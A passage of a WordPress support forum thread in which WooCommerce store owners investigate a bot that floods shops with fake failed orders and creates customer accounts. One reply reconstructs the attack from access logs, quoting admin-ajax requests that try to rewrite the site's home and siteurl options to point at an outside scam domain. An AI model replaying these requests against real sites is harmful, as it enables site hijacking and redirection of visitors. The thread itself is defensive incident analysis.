Failed Orders – Fake Information

  • Resolved mywebmaestro

    (@mywebmaestro)


    4 years, 4 months ago

    This morning I had several clients report they’ve been seeing “failed orders” in their stores, where the payment failed and the info was obviously fake. (See below.) I haven’t found any reference to this online yet, but wanted to know if there’s a way to determine if this is a general software spam attack against woocommerce stores overall, or something specific to sites on my server. Has anyone else here seen this? Or is there some way I can determine more information and/or protect against it?

    Order info:
    bbbbb bbbbb
    bbbbb
    74 xxxxxxx Rd
    xxxxxxx
    EX14 5HN
    United Kingdom (UK)
    xxx xxxx xxxx
    [email protected] (another one used [email protected])

Viewing 15 replies - 106 through 120 (of 159 total)

  • Another thanks here @wigster

    @madjax

    can you point me as to where these logs would be?

    I’m also getting these types of orders.

    @wpstack92 that’s going to depend on your hosting setup.

    @bobwey1 what about you – do you have access logs from the server?

    Unfortunately both sites I’m troubleshooting are on a platform that disables access logs by default.

    Anonymous User 13665966

    (@anonymized-13665966)

    Here’s the deal with this bot attack, reading between the lines and using log files to help:

    1. The bot tries to take exploit several vulnerabilities that have been out there in the wild and may affect specific plugins or versions of WordPress. This is clearly in an attempt to avoid using other means.

    2. It then grabs a copy of the homepage, parses it, and finds the first product ID it can get its hands on.

    3. It then goes to the cart, and then to the checkout.

    54.39.175.230 https://www.REDCATED.co.uk – [02/Nov/2020:09:26:52 +0000] “POST /?add-to-cart=6748 HTTP/1.0” 302 0 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:52 +0000] “GET /cart HTTP/1.0” 200 32314 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:53 +0000] “POST /checkout HTTP/1.0” 200 35936 “https://www.REDACTED.co.uk/checkout” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”

    4. Now on the checkout, it’s likely making a note of the wp_woocommerce_session_XXXXX cookie value that gets generated in the browser, it can use this to continue the session in the next step.

    5. A custom HTTP script written in the Go language (popular with black and white/grey hat hackers) is then hitting the checkout; this is clear from the user-agent and the fact there is no HTTP referrer e.g.

    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:56 +0000] “POST /checkout HTTP/1.0” 200 36638 “-” “Go-http-client/1.1”

    6. That script is creating the order, and is also likely to be exploiting whatever vulnerabilty is available to bypass customer account settings and create a new user; it may or may not be relying upon other exploits for this.

    7. Assuming it has successfully gained access to the system, it then tries to update the DB

    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:58 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:59 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:27:00 +0000] “POST /wp-admin/profile.php?wc-ajax=1 HTTP/1.0” 500 178 “https://www.REDACTED.co.uk/wp-admin/profile.php?wc-ajax=1” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”

    8. It either fails and leaves you with nuisance orders, or succeeds and points your site to the scam URL.

    @madjax

    that’s going to depend on your hosting setup.

    Kinsta…

    @wpstack92 see https://kinsta.com/knowledgebase/wordpress-error-log/

    I already posted the access logs from a failed order

    @dmsims did your fake orders create customer user accounts?

    @madjax

    Yes accounts were created

    MV

    (@mvenkadesan)

    I also confirm that the fake orders created user accounts. I notice that new customers were created for any order, failed or successful. New users are created corresponding to these customers, with the role being set to Customer. Is that the same for others?

    @dmsims so this is every access log entry for this IP?

    82.78.27.18 – – [02/Nov/2020:08:01:29 +0000] “GET / HTTP/1.1” 200 11968
    82.78.27.18 – – [02/Nov/2020:08:01:32 +0000] “GET / HTTP/1.1” 200 11966
    82.78.27.18 – – [02/Nov/2020:08:01:34 +0000] “GET /?token=9f5cd4863381fd7ff7973c33f7a556ea HTTP/1.1” 200 11967
    82.78.27.18 – – [02/Nov/2020:08:02:03 +0000] “POST /checkout/ HTTP/1.1” 200 41612

    @mvenkadesan what are your user registration settings?

    WP Settings > General
    “Anyone can register” ?

    WooCommerce Settings > Accounts & Privacy
    “Allow customers to create an account during checkout” ?
    “Allow customers to create an account on the “My account” page” ?

    @madjax

    Yes they are all the entries for 82.78.27.18

    Here is another previous one:

    123.100.241.85 – – [27/Oct/2020:22:35:05 +0000] “POST / HTTP/1.1” 200 12763
    123.100.241.85 – – [27/Oct/2020:22:35:07 +0000] “POST / HTTP/1.1” 200 12762
    123.100.241.85 – – [27/Oct/2020:22:35:09 +0000] “POST /basket/ HTTP/1.1” 200 29451
    123.100.241.85 – – [27/Oct/2020:22:35:11 +0000] “POST /product-category/originals/ HTTP/1.1” 200 11724
    123.100.241.85 – – [27/Oct/2020:22:35:14 +0000] “POST /product-category/prints/ HTTP/1.1” 200 10092
    123.100.241.85 – – [27/Oct/2020:22:35:16 +0000] “POST /product-category/prints/medium-prints/ HTTP/1.1” 200 12265
    123.100.241.85 – – [27/Oct/2020:22:35:18 +0000] “POST /product-category/prints/small-prints/ HTTP/1.1” 200 11775
    123.100.241.85 – – [27/Oct/2020:22:35:20 +0000] “POST /product-category/ceramics/mugs/ HTTP/1.1” 200 11768
    123.100.241.85 – – [27/Oct/2020:22:35:22 +0000] “POST /product-category/greetings-cards/ HTTP/1.1” 200 10135
    123.100.241.85 – – [27/Oct/2020:22:35:24 +0000] “POST /product-category/greetings-cards/cards-for-all-occasions/ HTTP/1.1” 200 11684
    123.100.241.85 – – [27/Oct/2020:22:35:27 +0000] “POST /product-category/greetings-cards/christmas-cards/ HTTP/1.1” 200 11227
    123.100.241.85 – – [27/Oct/2020:22:35:28 +0000] “POST /product-category/tableware/ HTTP/1.1” 200 9889
    123.100.241.85 – – [27/Oct/2020:22:35:30 +0000] “POST /product-category/tableware/coasters/ HTTP/1.1” 200 10316
    123.100.241.85 – – [27/Oct/2020:22:35:32 +0000] “POST /product-category/tableware/placemats/ HTTP/1.1” 200 10375
    123.100.241.85 – – [27/Oct/2020:22:35:34 +0000] “POST /shop/ HTTP/1.1” 200 12096
    123.100.241.85 – – [27/Oct/2020:22:35:45 +0000] “POST /checkout/ HTTP/1.1” 200 42017

    MV

    (@mvenkadesan)

    @madjax :

    WP Settings > General
    “Anyone can register” ?

    Unchecked

    WooCommerce Settings > Accounts & Privacy
    “Allow customers to create an account during checkout” ?

    Checked

    “Allow customers to create an account on the “My account” page” ?

    Checked

Viewing 15 replies - 106 through 120 (of 159 total)
  • The topic ‘Failed Orders – Fake Information’ is closed to new replies.